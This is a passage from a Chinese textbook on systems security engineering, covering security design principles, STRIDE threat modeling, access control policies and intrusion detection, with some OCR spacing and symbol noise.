认识 系统 化 思维 ,可 以 从 对 自然 系统 的 观察 中 获得 启发 。 一 般 而 言 ,每 个 人 会 经 历 出 
生 、 成 长 成熟 .衰老 、 死 亡 等 阶段 度 过 一 生 。 一 个 人 是 一 个 系统 ,而 且 属 于 自然 系统 。 一 
个 系统 这 样 的 一 生 通 常 称 为 该 系统 的 生命 周期 (Life Cycle) 。 与 自然 系统 类 似 , 人 工 系统 
也 有 生命 周期 。 只 是 ,人 工 系统 是 人 为 了 满足 某 种 需要 而 建造 的 具有 特定 用 途 的 系统 。 
人 工 系 统 的 生命 周期 包含 系统 需求 .系统 分 析 、 系 统 建 模 与 设计 .系统 构建 与 测试 ,系统 使 
用 与 老化 .系统 报废 等 阶段 。 

若 要 使 一 个 人 工 系统 能 够 可 信赖 地 完成 它 的 使 命 ,那么 就 应 该 确保 其 生命 周期 各 个 
阶段 的 任务 都 得 以 顺利 完成 。 建 造 人 工 系统 (如 飞船 .高 铁 、 桥 梁 、 计 算 机 等 ) 的 工作 离 不 
开工 程 活动 ,这 里 所 说 的 工程 就 是 系统 工程 , 它 力求 从 系统 生命 周期 中 工程 相关 活动 的 整 
体 过 程 保障 人 工 系统 可 以 得 到 信赖 ,其 含义 可 以 描述 如 下 。 
系统 工程 (Systems Engineering) 是 涵盖 系统 生命 周期 的 具有 关联 活动 和 任务 的 技术 
性 和 非 技术 性 过 程 的 集合 ,技术 性 过 程 应 用 工程 分 析 与 设计 原则 建设 系统 , 非 技术 性 过 程 
通过 工程 管理 保障 系统 建设 工程 项 目的 顺利 实施 。 

工程 表现 为 过 程 ,其 中 需要 完成 一 定 的 任务 ,为 此 需要 开展 相应 的 活动 。 技 术 性 过 程 
对 应 着 系统 的 建设 项 目 , 而 非 技 术 性 过 程 则 对 应 着 对 建设 项 目的 管理 。 

系统 工程 的 主要 目标 是 获得 总 体 上 可 信赖 的 系统 , 它 的 核心 是 系统 整体 思想 ,这 种 思 
想 通 过 系统 全 生命 周期 中 工程 技术 与 工程 管理 相 结合 的 过 程 来 体现 ,各 个 过 程 对 应 着 相 
应 的 活动 与 任务 ,这 些 活动 与 任务 的 全 面 实 施 是 实现 最 终 目标 的 措施 。 

系统 工程 为 建设 可 信赖 的 人 工 系 统 提 供 了 一 套 基础 保障 。 系 统 的 可 信赖 性 指 人 们 可 
以 相信 该 系统 能 够 可 靠 地 完成 它 的 使 命 。 以 桥梁 为 例 ,通俗 地 说 ,可 信赖 的 桥梁 能 够 抵抗 
风 吹 日 晒 雨 打 , 保 证 车 辆 和 行人 平安 通行 ,在 正常 情况 下 不 会 垮塌 。 

系统 工程 适用 于 网 络 空间 中 的 系统 建设 。 针 对 系统 的 安全 性 ,为 了 建设 可 信赖 的 安 
全 系统 ,换言之 ,为 了 得 到 安全 性 值得 信赖 的 系统 ,需要 在 系统 工程 中 融入 安全 性 相关 要 
素 。 把 安全 性 相关 活动 和 任务 融合 到 系统 工程 的 过 程 之 中 ,形成 了 系统 工程 的 一 个 专业 
分 支 , 即 系统 安全 工程 (Systems Security Engineering) , 它 力求 从 系统 生命 周期 的 全 过 程 
保障 系统 的 安全 性 。 

系统 的 安全 性 值得 信赖 等 价 于 系统 具有 可 信 的 安全 性 , 指 可 以 相信 该 系统 具有 所 期 
待 的 应 对 安全 威胁 的 能 力 ,如果 安 全 事件 发 生 . 这 种 能 力 能 把 系统 受到 的 破坏 或 损失 降 到 
最 低 。 安 全 性 相关 活动 指 为 了 使 系统 具有 应 对 威胁 的 能 力 ,在 系统 生命 周期 的 规划 、 设 
计 、 实 现 ,测试 ,使 用 、 淘 汰 等 各 个 阶段 应 开展 的 工作 。 

简 而 言 之 ,系统 安全 思维 重视 整体 论 思想 ,强调 从 系统 的 全 生命 周期 衡量 系统 的 安全 
性 ,主张 通过 系统 安全 工程 措施 建立 和 维护 系统 的 安全 性 。 当 然 ,强调 整体 论 并 不 意味 着 
要 否定 还 原 论 的 作用 ,而 是 说 ,仅仅 依靠 还 原 论 的 方法 是 远 远 不 够 的 。 
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系统 安全 
站 在 系统 建设 者 的 位 置 ,要 把 安全 理念 贯彻 到 系统 建设 之 中 。 为 此 ,需要 掌握 系统 建 原理 
设 的 基本 原则 ,关键 方法 和 保障 措施 。 关 键 方法 需要 回答 如 何 着 手 和 如 何 应 对 的 问题 ,而 
应 对 策略 分 为 事前 预防 和 事后 补救 两 个 方面 。 概 括 起 来 ,系统 建设 者 需要 思考 基本 原则 、 
着 手 方式 .事前 预防 ,事后 补救 和 保障 措施 等 方面 的 事宜 ,分 别 由 以 下 基本 原则 威胁 建 
模 、 安 全 控制 安全 监测 和 安全 管理 等 各 小 节 一 一 解答 。 


4.2.1 基本 原则 


在 网 络 空 间 中 ,系统 的 设计 与 实现 是 系统 生命 周期 中 分 量 很 重 的 两 个 阶段 ,长 期 以 来 
受到 了 人 们 的 高 度 关注 ,形成 了 一 系列 对 系统 安全 具有 重要 影响 的 基本 原则 。 这 些 原则 
可 以 划分 成 三 类 ,分 别 是 限制 性 原则 ,简单 性 原则 和 方法 性 原则 。 

限制 性 原则 包括 最 小 特权 原则 .失败 -保险 默认 原则 完全 仲裁 原则 、 特 权 分 离 原则 和 
信任 最 小 化 原则 。 

CD 最 小 特权 原则 (Least Privilege) : 系统 中 执行 任务 的 实体 (程序 或 用 户 ) 应 该 只 拥 
有 完成 该 项 任务 所 需 特权 的 最 小 集合 ;如 果 只 要 拥有 7 项 特权 就 足以 完成 所 承担 的 任 
务 ,就 不 应 该 拥有 十 1 项 或 更 多 的 特权 。 

@ 失败 -保险 默认 原则 (Fail-Safe Defaults) : 安全 机 制 对 访问 请 求 的 决定 应 采取 默认 
拒绝 方案 ,不 要 采取 默认 允许 方案 ;也 就 是 说 ,只 要 没有 明确 的 授权 信息 ,就 不 允许 访问 ， 
而 不 是 ,只 要 没有 明确 的 否定 信息 ,就 允许 访问 。 

C 完全 仲裁 原则 (Complete Mediation) : 安全 机 制 实施 的 授权 检查 必须 能 够 覆盖 系 
统 中 的 任何 一 个 访问 操作 ,避免 出 现 能 逃 过 检查 的 访问 操作 。 该 原则 强调 访问 控制 的 系 
统 全 局 观 , 它 除了 涉及 常规 的 控制 操作 之 外 .还 涉及 初始 化 .恢复 、 关 停 和 维护 等 操作 , 它 
的 全 面 落 实 是 安全 机 制 发 挥 作用 的 基础 。 

CD 特权 分 离 原则 (Separation of Privilege) : 对 资源 访问 请 求 进行 授权 或 执行 其 他 安 
全 相关 行动 .不 要 仅 任 单一 条 件 做 决定 ,应 该 增加 分 离 的 条 件 因素 ;例如 ,为 一 把 锁 设 两 套 
不 同 的 钥匙 ,分 开 由 两 人 保管 ,必须 两 人 同时 拿 出 钥匙 才 可 以 开锁 。 

C) 信任 最 小 化 原则 (Minimize Trust) : 系统 应 该 建立 在 尽量 少 的 信任 假设 的 基础 
上 ,减少 对 不 明 对 象 的 信任 ;对 于 与 安全 相关 的 所 有 行为 ,其 涉及 的 所 有 输入 和 产生 的 结 
AR ,都 应 该 进行 检查 ,而 不 是 假设 它们 是 可 信任 的 。 

简单 性 原则 包括 机 制 经 济 性 原则 、 公 共 机 制 最 小 化 原则 和 最 小 惊讶 原则 。 

CD 机制 经 济 性 原则 (Economy of Mechanism): 应 该 把 安全 机 制 设计 得 尽 可 能 简单 
和 短小 ,因为 ,任何 系统 设计 与 实现 都 不 可 能 保证 完全 没有 缺陷 ;为 了 排查 此 类 缺陷 ,检测 
安全 漏洞 ,很 有 必要 对 系统 代码 进行 检查 ;简单 .短小 的 机 制 比较 容易 处 理 , 复 杂 、 庞 大 的 
机 制 比较 难处 理 。 

Q) 公共 机 制 最 小 化 原则 (Minimize Common Mechanism): 如 果 系 统 中 存在 可 以 由 
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两 个 以 上 的 用 户 共 用 的 机 制 ,应 该 把 它们 的 数量 减 到 最 少 ;每 个 可 共用 的 机 制 ,特别 是 涉 
及 共享 变量 的 机 制 ,都 代表 着 一 条 信息 传递 的 潜在 通道 ,设计 这 样 的 机 制 要 格外 小 心 , 以 
防 它 们 在 不 经 意 间 破坏 系统 的 安全 性 ,例如 信息 泄露 。 

C 最 小 惊讶 原则 (Least AstonishmenO : 系统 的 安全 特性 和 安全 机 制 的 设计 应 该 尽 
可 能 符合 逻辑 并 简单 ,与 用 户 的 经 验 、 预 期 和 想象 相 吻 合 , 尽 可 能 少 给 用 户 带 来 意外 或 惊 
讶 ,目的 是 提升 它们 传递 给 用 户 的 易 接受 程度 ,以 便 用 户 会 自觉 自愿 .习以为常 地 接受 和 
正确 使 用 它们 ,并 且 在 使 用 中 少 出 差错 。 

方法 性 原则 包括 公开 设计 原则 、 层 次 化 原则 、 抽 象 化 原则 、 模 块 化 原则 、 完 全 关联 原则 
和 设计 迭代 原则 。 

COD 公开 设计 原则 (Open Design) : 不 要 把 系统 安全 性 的 希望 寄托 在 保守 安全 机 制 设 
计 秘 密 的 基础 之 上 ,应 该 在 公开 安全 机 制 设计 方案 的 前 提 下 ,借助 容易 保护 的 特定 元 素 ， 
如 密 钥 ,口令 或 其 他 特征 信息 等 ,增强 系统 的 安全 性 ;公开 设计 思想 有 助 于 使 安全 机 制 接 
受 广 泛 的 审查 ,进而 提高 安全 机 制 的 鲁 棒 性 。 

@ 层次 化 原则 (Layering) : 应 该 采用 分 层 的 方法 设计 和 实现 系统 ,以 便 某 层 的 模块 
只 与 其 紧邻 的 上 层 和 下 层 模 块 进行 交互 ,这 样 ,可 以 通过 自 顶 向 下 或 自 底 向 上 的 技术 对 系 
统 进行 测试 ,每 次 可 以 只 测试 一 层 。 

@ 抽象 化 原则 (Abstraction) : 在 分 层 的 基础 上 ,屏蔽 每 一 层 的 内 部 细节 ,只 公布 该 
层 的 对 外 接口 ,这样 , 每 一 层 内 部 执行 任务 的 具体 方法 可 以 灵活 确定 ,在 必要 的 时 候 , 可 以 
自由 地 对 这 些 方法 进行 变更 ,而 不 会 对 其 他 层次 的 系统 组 件 产生 影响 。 

@ 模块 化 原则 (Modularity): 把 系统 设计 成 相互 协作 的 组 件 的 集合 ,用 模块 实现 组 
件 , 用 相互 协作 的 模块 的 集合 实现 系统 ;每 个 模块 的 接口 就 是 一 种 抽象 。 

@ 完全 关联 原则 (Complete Linkage) : 把 系统 的 安全 设计 与 实现 与 该 系统 的 安全 规 
格 说 明 紧 密 联系 起 来 。 

@ 设计 和 迭代 原则 (Design for Ieration) : 对 设计 进行 规划 的 时 候 , 要 考虑 到 必要 时 可 
以 改变 设计 ; 因 系统 的 规格 说 明 与 系统 的 使 用 环境 不 匹配 而 需要 改变 设计 时 ,要 使 这 种 改 
变 对 安全 性 的 影响 降 到 最 低 。 

为 了 使 全 生命 周期 的 整体 安全 保障 思想 落 到 实处 ,系统 的 设计 者 和 开发 者 在 设计 和 
实现 系统 的 过 程 中 ,应 该 深入 理解 .正确 把 握 、 自 觉 遵 守 以 上 原则 。 


4.2.2. 威胁 建 模 


安全 是 一 种 属性 ,是 应 对 威胁 的 属性 。 如 果 没 有 威胁 ,就 没 必要 谈 安 全 。 而 如 果 不 了 
解 威胁 ,显然 就 没 办 法 谈 安 全 。 只 有 把 威胁 弄 清 楚 , 才 可 能 知道 安全 问题 会 出 现在 哪里 ， 
才 可 能 制定 出 应 对 安全 问题 的 方法 ,从 而 获得 所 期 待 的 安全 。 这 里 面 蕴含 着 的 实际 上 就 
是 威胁 建 模 的 思想 。 为 说 清 这 一 思想 ,有 必要 先 说 说 安全 、 威 胁 、 风 险 等 相关 概念 。 
* 安全 (Security) 的 本 意 指 某 物 能 避免 或 抵御 他 物 带 来 的 潜在 伤害 。 在 大 多 数 情 况 
下 ,安全 意味 着 在 充满 敌意 的 力量 面前 保护 某 物 。 其 中 的 物 既 可 以 是 生物 也 可 以 
是 非 生物 , 既 可 以 是 人 ,也 可 以 是 其 他 东西 。 
。 威胁 (Threat) 的 本 意 指 给 某 物 造 成 伤害 或 损失 的 意图 。 意 图 表示 事情 还 没有 发 
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生 , 伤 害 或 损失 还 没有 成 为 事实 。 例 如 ,在 乡村 的 一 户 农舍 门口 ,一 条 狗 正 对 着 你 
怒 目 而 视 , 表 现 出 随时 向 你 扑 去 的 意图 ,这 明显 是 对 你 的 威胁 ,一 旦 它 扑 过 去 撕 咬 
你 ,你 就 会 受到 伤害 。 

风险 (Risk) 的 本 意 指 某 物 遭受 伤害 或 损失 的 可 能 性 。 可 能 性 有 大 有 小 ,意味 着 风 
险 具 有 大 小 程度 指标 。 遇 到 凶狠 的 看 家 狗 时 ,你 被 咬 的 风险 很 大 , 遇 到 温顺 的 宠 
物 狗 时 ,你 被 咬 的 风险 很 小 。 

由 上 述 3 个 概念 的 本 意 可 知 , 它 们 存在 内 在 联系 。 安 全 代表 避免 伤害 ,风险 代表 可 能 
伤害 ,可 见 , 风 险 意味 着 安全 难保 ,所 以 ,风险 就 是 安全 风险 , 即 导 致 安全 受 损 的 风险 。 另 
一 方面 ,威胁 代表 产生 伤害 的 意图 ,给 伤害 带 来 可 能 性 ,因此 ,威胁 是 风险 之 源 。 概 括 地 
说 ,威胁 引起 风险 ,风险 影响 安全 。 故 此 ,需要 针对 威胁 采取 措施 ,降低 风险 ,减少 安全 
损失 。 

威胁 一 旦 实施 ,就 成 了 攻击 。 换 言 之 ,攻击 (Attack) 就 是 把 威胁 付 诸 实 施 的 行为 。 而 
攻击 的 前 后 经 历 就 是 安全 事件 。 攻 击 如 果 成 功 了 ,威胁 所 预示 的 伤害 或 损失 就 变 成 了 事 
实 。 或 者 说 ,安全 事件 发 生 后 ,安全 风险 就 成 了 实 实在 在 的 体现 , 那 便 是 安全 事件 所 产生 
的 后 果 。 

威胁 建 模 (Threat Modeling) 就 是 标识 潜在 安全 威胁 并 审视 风险 缓解 途径 的 过 程 。 
威胁 建 模 的 目的 是 : 在 明确 了 系统 的 本 质 特 征 、 潜 在 攻击 者 的 基本 情况 .最 有 可 能 的 被 攻 
击 角度 ,攻击 者 最 想得到 的 好 处 等 的 情况 下 ,为 防御 者 提供 系统 地 分 析 应 采取 的 控制 或 防 
御 措施 的 机 会 。 威 胁 建 模 回 答 像 这 样 的 问题 : 被 攻击 的 最 薄弱 之 处 在 哪里 .最 相关 的 攻 
击 是 什么 为 应 对 这 些 攻 击 应 该 怎么 做 等 。 

在 路 过 乡村 农户 门口 的 例子 中 ,威胁 建 模 明确 的 潜在 威胁 是 恶狠狠 地 盯 着 你 的 那 条 
狗 可 能 突然 猛 扑 过 去 撕 咬 。 你 会 受到 的 伤害 可 能 是 鲜血 淋漓 ,更 为 担心 的 是 怕 染 上 狂犬 
病 。 应 对 那样 的 威胁 的 办 法 可 以 是 撒 腿 就 跑 , 如 果 你 估计 跑 得 比 它 快 的 话 ; 或 者 ,赶紧 就 
地 捡 几 块 石头 砸 它 ;如 果 周 围 根本 找 不 到 石头 ,就 假装 蹲 下 捡 石头 并 向 它 砸 去 的 样子 吧 ， 
但 愿 这 样 能 把 它 吓 退 。 

在 开发 Adept-50 安全 操作 系统 的 时 候 , 威 胁 建 模 能 明确 的 主要 安全 威胁 是 保密 信息 
泄露 。 当 时 的 一 个 大 型 主机 系统 会 处 理 和 存放 含有 不 同 密级 的 信息 ,比如 ,绝密 、 机 密 、 秘 
密 , 非 密 等 级 别 的 信息 ,特别 是 军事 方面 的 信息 。 使 用 系统 的 用 户 的 职务 身份 对 应 着 一 定 
的 涉 密 等 级 。 威 胁 的 具体 表现 是 涉 密 等 级 低 的 用 户 可 能 会 查阅 到 保密 级 别 高 的 信息 。 应 
对 这 种 威胁 的 办 法 是 制定 和 实施 根据 涉 密 等 级 控制 对 信息 进行 访问 的 规则 。Adept-50 
实现 的 是 一 组 称 为 低 水 标 模型 的 访问 控制 规则 。 

对 一 个 系统 进行 威胁 建 模 的 一 般 过 程 是 首先 勾画 该 系统 的 抽象 模型 ,以 可 视 化 的 形 
式 把 它 表示 出 来 ,在 其 中 画 出 该 系统 的 各 个 组 成 元 素 ,可 以 基于 数据 流 图 或 过 程 流 图 进行 
表示 ;然后 以 系统 的 可 视 化 表示 为 基础 ,标识 和 列举 出 系统 中 的 潜在 威胁 。 这 样 得 到 的 威 
胁 框架 可 供 后 续 分 析 , 制 定 风 险 缓解 对 策 。 

威胁 建 模 实践 在 威胁 建 模 方法 的 指引 下 进行 。 威 胁 建 模 方法 有 以 风险 为 中 心 、 以 资 
产 为 中 心 、 以 攻击 者 为 中 心 、 以 软件 为 中 心 等 类 型 。 典 型 的 威胁 建 模 方法 有 STRIDE、 
PASTA,Trike, VAST 等 。 
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以 STRIDE 为 例 ,该 方法 首先 给 待 分 析 的 系统 建 模 ,通过 建立 数据 流 图 ,标识 系统 实 
体 、 事 件 和 系统 边界 。 然 后 ,以 数据 流 图 为 基本 输入 发 现 可 能 存在 的 风险 。 该 方法 的 名 称 
是 身份 欺骗 .数据 纂 改 、 抵 赖 、 信 息 泄露 .拒绝 服务 、 特 权 提升 等 威胁 类 型 的 缩写 , 它 表 示 该 
方法 重点 检查 系统 中 是 否 存 在 这 些 类 型 的 风险 。 


4.2.3 ”安全 控制 


古人 云 : 宜 未 雨 而 绸 缪 , 毋 临 渴 而 气井。 

对 系统 进行 安全 保护 的 最 美好 愿景 是 提前 做 好 准备 ,防止 安全 事件 的 发 生 。 访 问 控 
制 (Access Control) 就 是 这 方面 的 努力 之 一 , 它 的 目标 是 防止 系统 中 出 现 不 按 规 矩 对 资源 
进行 访问 的 事件 。 

访问 行为 的 常见 情形 是 某 个 用 户 对 某 个 文件 进行 操作 ,操作 的 方式 可 以 是 查看 、 复 制 
或 修改 ,如 果 该 文件 属于 程序 ,操作 的 方式 也 可 以 是 运行 。 在 访问 行为 中 ,用 户 是 主动 的 ， 
称 为 主体 ,文件 是 被 动 的 , 称 为 客体 。 如 果 用 s、o 、p 分 别 表示 主体 、 客 体 、 操 作 , 那 么 ,一 
个 访问 行为 ,或 者 简单 地 说 一 个 访问 ,可 以 形式 化 地 表示 成 以 下 三 元 组 : 

(s,0.p) 

(EROR EAE s 对 客体 o 执行 操作 p ,对 应 前 述 示例 ,p 的 取 值 可 以 是 read、copy、modify、 
execute 中 的 任意 一 个 。 

系统 中 负责 访问 控制 的 组 成 部 分 称 为 访问 控制 机 制 。 访 问 控制 机 制 的 重要 任务 之 一 
是 在 接收 到 一 个 (s, o，p) 请 求 时 ,判断 能 不 能 批准 (s,o,p) 执 行 ,作出 允许 执行 或 禁止 
执行 的 决定 ,并 指示 和 协助 系统 实施 该 决定 。 

访问 控制 需要 确定 主体 的 身份 (Identity) ,确定 主体 身份 的 过 程 称 为 身份 认证 
(Authentication) 。 身 份 认证 最 常用 的 方法 是 基于 口令 (Password) 进 行 认 证 ,主体 向 系统 
提供 账户 名 和 口令 信息 ,由 系统 对 这 些 信 息 进 行 核实 。 

口令 认证 法 与 现实 中 对 暗号 的 方法 很 相似 。 主 体 事先 与 系统 约定 了 账户 名 和 口令 信 
息 , 认 证 时 系统 就 可 以 进行 核实 。 

身份 认证 方法 很 多 ,除了 口令 认证 ,还 有 生物 特征 认证 和 物理 介质 认证 等 。 指 纹 识 
别人 脸 识别 .虹膜 识别 等 属于 生物 特征 认证 。 智 能 门 卡 属于 物理 介质 认证 。 

系统 中 出 现 的 各 种 访问 要 符合 规矩 ,规矩 的 专业 说 法 叫 访问 控制 策略 (Policy)。 访 
问 控 制 机 制 的 另 一 项 重要 任务 是 定义 访问 控制 策略 ,其 中 包含 给 主体 分 配 访问 权限 。 分 
配 访问 权限 的 过 程 称 为 授权 (Authorization) 。 

抽象 地 说 ,访问 权限 的 分 配 情况 可 以 用 一 个 矩阵 表示 。 和 矩阵 的 每 一 行 对 应 一 个 主体 ， 
每 一 列 对 应 一 个 客体 。 和 矩阵 的 每 一 个 元 素 是 一 组 权限 ,表示 对 应 主体 所 拥有 的 访问 对 应 
客体 的 权限 。 这 样 的 矩阵 称 为 访问 控制 矩阵 。 

一 组 权限 可 以 表示 为 一 个 以 权限 为 元 素 的 集合 。 通 常 以 访问 中 的 操作 的 名 称 作为 相 
应 权限 的 名 称 ,比如 ,用 read 作为 read 操作 的 权限 名 称 。 设 矩阵 中 位 于 主体 * 与 客体 o 
交叉 位 置 上 的 元 素 为 m ,如果 pp 出 现在 m 中 , 则 表示 s 有 权 对 o 执行 p 操作 。 例 如 : 

假设 m — (read. copy? 

Wi] s 拥有 对 o 执行 read 和 copy 操作 的 权限 
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如 果 p — read £X p — copy 
则 6G. 0. Pp) 可 以 执行 
如 果 p — modify 或 p — execute 
JW (s ,0o,p) 不 许 执行 
结合 以 上 介绍 ,可 定义 一 个 访问 控制 策略 如 下 。 
。 访问 控制 策略 1: 构造 访问 控制 矩阵 M ,给 矩阵 M 中 的 元 素 赋值 ,对 于 任意 (;， 
o, 力 ) 访 问 请 求 , 在 M 中 找到 s flo 交叉 位 置 上 的 元 素 , 当 p Em 时 ,允许 (s， 
o, 记 ) 执 行 ,否则 ,禁止 (*,，o, p) 执 行 。 
在 策略 1 中 ,给 矩阵 M 中 的 元 素 赋 值 的 过 程 就 是 授权 过 程 。 显 然 , 该 策略 是 给 每 一 
个 主体 进行 授权 的 。 在 现实 应 用 中 ,有 时 不 需要 给 每 一 个 用 户 进行 授权 ,只 须 给 岗位 进行 
授权 ,例如 ,分 别 给 校长 、 院 长 .教师 ,学生 等 授权 ,这 里 的 校长 等 称 为 角色 。 某 个 用 户 属于 
哪个 角色 就 享有 哪个 角色 的 权限 。 
可 以 把 矩阵 M 改造 为 矩阵 MS ,MF 与 M 只 有 一 点 不 同 , 它 的 每 一 行 对 应 一 个 角色 ， 
而 不 是 一 个 主体 。 设 计 一 个 角色 分 配方 案 ,为 每 个 用 户 分 配角 色 。 给 一 个 用 户 分 配 的 角 
色 可 以 不 止 一 个 ,例如 ,一 个 用 户 可 以 既是 老师 也 是 院 长 。 为 简单 起 见 , 这 里 把 分 配给 一 
个 用 户 的 角色 数 限 制 为 一 个 。 用 函数 /表示 角色 分 配方 案 , 它 的 输入 是 任意 用 户 , 输 出 
是 给 该 用 户 分 配 的 角色 。 可 以 定义 男 一 个 访问 控制 策略 如 下 。 
。 访问 控 制 策略 2. 构造 访问 控制 矩阵 M* ,设计 角色 分 配方 案 / ,给 矩阵 M8R 中 的 
元 素 赋值 , 按 方案 /给 每 个 用 户 分 配角 色 ,对 于 任意 (kw,，o,， pp) 访 问 请 求 ,u 表示 
用 户 ,确定 角色 三 (xz) ,在 MS 中 找到 和 o 交叉 位 置 上 的 元 素 m, 当 pEm 
时 ,允许 (wu, o. pp) 执行 ,否则 ,禁止 (u ,0o,p) 执 行 。 
在 策略 2 中 ,给 矩阵 M* 中 的 元 素 赋 值 和 按 方 案 /给 每 个 用 户 分 配角 色 是 授权 
过 程 。 
策略 1 比较 简单 , 它 根据 主体 的 身份 标识 就 可 以 做 访问 决定 。 在 涉 密 信息 分 级 保护 
的 应 用 中 ,无 法 简单 依据 主体 标识 做 访问 决定 ,需要 根据 信息 的 保密 级 别 和 主体 的 涉 密 等 
级 进行 判断 。 针 对 这 类 情形 ,需要 制定 主体 等 级 和 客体 密级 分 配方 案 fs 和 fo ,设计 主体 
等 级 fs(s) 与 客体 密级 fo (o) 的 对 比方 法 cmp, 设 定 任意 操作 x 应 该 满足 的 条 件 
con(x), 在 此 基础 上 ,可 定义 访问 控制 策略 如 下 。 
。 访 问 控 制 策 略 3: 制定 主体 等 级 分 配方 案 /s 和 客体 密级 分 配方 案 f o ,设计 主体 等 
级 与 客体 密级 的 对 比方 法 cmp, 设 定 任意 操作 z 应 该 满足 的 条 件 con(z ) ,给 每 个 
主体 分 配 涉 密 等 级 ,给 每 个 客体 分 配 保密 级 别 , 对 于 任意 (*，o, 户 ) 访 问 请 求 , 当 
cmp(fs(s), fo(o)) 满 足 条 件 con(p) 时 ,允许 (s, o. p) 执 行 ,否则 ,禁止 (s, 0， 
DA. 
在 实际 应 用 中 , 涉 密 等 级 和 保密 级 别 分 别 是 给 主体 和 客体 打上 的 安全 标签 ,所 以 , 策 
略 3 中 的 fs(s) 和 fo(o) 分 别 是 主体 和 客体 o 的 安全 标签 的 值 。 给 每 个 主体 分 配 涉 密 
等 级 和 给 每 个 客体 分 配 保密 级 别 的 过 程 是 策略 3 的 授权 过 程 。 
访问 控制 策略 是 为 了 满足 应 用 的 需要 制定 的 ,由 于 应 用 需求 多 种 多 样 ,所 以 访问 控制 
策略 也 多 种 多 样 。 
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从 访问 判定 因素 的 形式 看 ,策略 1 以 主体 的 身份 标识 作为 判定 因素 ,属于 基于 身份 的 
访问 控制 ,策略 2 以 角色 作为 判定 因素 ,属于 基于 角色 的 访问 控制 ,策略 3 以 安全 标签 作 
为 判定 因素 ,属于 基于 标签 的 访问 控制 。 

从 授权 者 的 限定 条 件 看 ,策略 1 的 授权 者 通常 是 客体 的 拥有 者 ,客体 。 的 拥有 者 可 以 
自主 确定 任意 主体 * 对 客体 。 的 访问 权限 ,这 样 的 访问 控制 称 为 自主 访问 控制 。 策 略 3 
的 授权 者 通常 是 系统 中 特定 的 管理 者 ,任何 客体 o 的 拥有 者 都 不 能 自主 确定 任何 主体 s 
对 客体 o 的 访问 权限 ,这 样 的 访问 控制 称 为 非 自主 访问 控制 ,也 就 是 强制 访问 控制 。 


4.2.4 安全 监测 


古人 云 : 亡 羊 而 补 牢 ,未 为 迟 也 。 

和 自然 界 中 的 情形 一 样 ,网 络 空间 中 的 系统 及 其 环境 一 直 处 于 不 断 的 变换 之 中 , 方 方 
面 面 的 不 确定 因素 大 量 存在 。 由 于 热力 学 第 二 定律 的 作用 ,混乱 总 是 不 停 地 增加 。 正 如 
天 灾 人 祸 在 所 难免 一 样 ,安全 事件 是 不 可 能 根除 的 。 既 然 不 得 不 面 对 , 系 统 至 少 应 能 感知 
安全 事件 的 发 生 ,增强 事后 补救 能 力 。 

尘 落 留 痕 , 风 过 有 声 。 大 街 小 埠 的 摄像 头 注视 着 人 们 的 举动 ,地面 空 管 站 的 仪器 设备 
记录 着 飞机 在 空中 的 航 迹 。 社 会 上 的 不 良 行为 不 可 能 不 留 下 丝毫 蛛丝马迹 。 在 网 络 空间 
中 ,各 种 日 志 机 制 记录 着 系统 运行 的 轨迹 。 实 际 上 ,各 种 监控 摄像 也 早已 融入 网 络 空间 之 
中 。 网 络 空间 安全 事件 的 监测 是 有 基础 的 。 

系统 的 完整 性 检查 机 制 提供 从 开机 引导 到 应 用 运行 各 个 环节 的 完整 性 检查 功能 ,可 
以 帮助 发 现 系 统 中 某 些 重要 组 成 部 分 受到 算 改 或 破坏 的 现象 。 病 毒 或 恶意 软件 是 困扰 系 
统 安全 的 常见 因素 ,病毒 查 杀 和 恶意 软件 检测 机 制 可 以 通过 对 系统 中 的 各 种 文件 进行 扫 
描 , 帮 助 发 现 或 清除 进入 到 系统 之 中 的 大 多 数 病毒 或 恶意 软件 。 

入 侵 检测 是 安全 监测 中 广泛 采用 的 重要 形式 , 它 对 恶意 行为 或 违反 安全 策略 的 现象 
进行 监测 ,一 旦 发 现 情况 就 及 时 报告 ,必要 时 发 出 告警 。 入 侵 检 测 机 制 具有 较 大 的 伸缩 
性 ,监测 范围 可 以 小 到 单 台 设备 ,大 到 一 个 大 型 网 络 。 

从 监测 对 象 的 角度 看 ,入 侵 检测 可 分 为 主机 入 侵 检测 和 网 络 入侵 检 测 两 种 类 型 。 

。 主机 入 侵 检测 系统 (Host Intrusion Detection System. HIDS) 运 行 在 网 络 环境 中 
的 单 台 主机 或 设备 上 , 它 对 流入 和 流出 主机 或 设备 的 数据 包 进 行 监测 ,一 旦 发 现 
可 疑 行为 就 发 出 警告 。HIDS 的 一 个 典型 例子 是 对 操作 系统 的 重要 文件 进行 监 
测 ,检测 时 , 它 把 操作 系统 重要 文件 的 当时 快照 与 事先 采集 的 基准 快照 进行 对 比 ， 
如 果 发 现 关 键 文 件 被 修改 或 删除 ,就 发 出 警告 。 

网 络 入 侵 检测 系统 (Network Intrusion Detection System) 部 署 在 网 络 中 的 策略 性 
节点 上 , 它 对 网 络 中 所 有 设备 的 流出 和 流入 流量 进行 监测 ,对 通过 整个 子 网 的 流 
量 进 行 分 析 , 并 与 已 知 攻 击 库 中 的 流量 进行 对 比 , 识 别 出 攻 击 行为 时 ,或 感知 到 异 
常 行为 时 ,就 发 出 警告 。 

从 检测 方法 的 角度 看 ,入 侵 检测 可 分 为 基于 特征 的 入 侵 检测 和 基于 异常 的 入 侵 检测 
两 种 类 型 。 

。 基于 特征 的 入 侵 检测 的 基本 思想 是 从 已 知 的 入 侵 中 提炼 出 特定 的 模式 ,检测 时 ， 
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从 被 检测 对 象 中 寻找 已 知 入 侵 所 具有 的 模式 ,如 果 能 找到 ,就 认为 检测 到 了 攻击 。 
被 检测 对 象 可 以 是 网 络 流量 中 的 字 节 序列 ,或 者 恶意 软件 使 用 的 恶意 指令 序列 。 
显然 ,这 种 检测 方法 可 以 比较 容易 地 检测 出 已 知 攻 击 ,但 很 难 检测 出 新 的 攻击 , 因 
为 缺乏 新 攻击 对 应 的 模式 。 
* 基于 异常 的 人 侵 检测 的 基本 思想 是 给 可 信 的 行为 建 模 ,检测 时 ,把 待 检测 的 行为 
与 已 知 的 可 信行 为 模型 对 比 ,如 果 差 异 较 大 , 则 认为 是 攻击 行为 。 机 器 学 习 技 术 
可 以 根据 行为 数据 训练 出 行为 模型 ,如 果 有 一 定数 量 的 可 信行 为 数据 样本 , 它 可 
以 为 可 信行 为 建立 模型 。 在 实际 应 用 中 ,采集 可 信行 为 数据 是 有 可 能 的 ,因此 ,可 
信行 为 模型 可 以 通过 机 器 学 习 技 术 训练 得 到 。 这 种 检测 方法 的 优点 是 可 以 检测 
